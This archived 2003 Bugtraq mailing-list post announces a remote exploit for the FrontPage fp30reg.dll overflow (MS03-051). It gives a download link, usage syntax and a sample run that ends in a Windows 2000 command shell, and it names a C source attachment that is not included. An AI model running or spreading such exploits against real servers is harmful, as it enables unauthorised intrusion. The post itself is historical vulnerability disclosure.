[<prev] [next>] [day] [month] [year] [list]
Message-ID: <12747039338.20031115044512@hotmail.kg>
Date: Sat, 15 Nov 2003 04:45:12 +0600
From: Adik <netninja@...mail.kg>
To: bugtraq@...urityfocus.com
Subject: [Exploit]: Microsoft FPSE fp30reg.dll Overflow Remote Exploit (MS03-051)
Hello folks,
If anyone is interested in an exploit for recently announced FPSE fp30reg.dll
overflow bug (MS03-051) by Brett Moore, u can pick it up at
http://netninja.to.kg
---- fp30reg.dll overflow -------
C:\fp30reg
-={ Frontpage fp30reg.dll Overflow Exploit (MS03-051) ver 0.2 }=-
by Adik < netmaniac [at] hotmail.KG >
http://netninja.to.kg
Usage: fp30reg [Target] <port>
eg: fp30reg.exe 192.168.63.130
C:\>fp30reg 192.168.63.130
-={ Frontpage fp30reg.dll Overflow Exploit (MS03-051) ver 0.2 }=-
by Adik < netmaniac [at] hotmail.KG >
http://netninja.to.kg
[*] Target: 192.168.63.130 Port: 80
[*] Socket initialized...
[*] Checking for presence of fp30reg.dll... Found!
[*] Packet injected!
[*] Sleeping . . . . . . . . . . . . .
[*] Connecting to host: 192.168.63.130 on port 9999
[*] Dropping to shell...
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
------------
CHeerz,
Adik
Download attachment "fp30reg.c" of type "application/octet-stream" (9281 bytes)
Scanned by evaluation version of Dr.Web antivirus Daemon
http://drweb.ru/unix/
Powered by blists - more mailing lists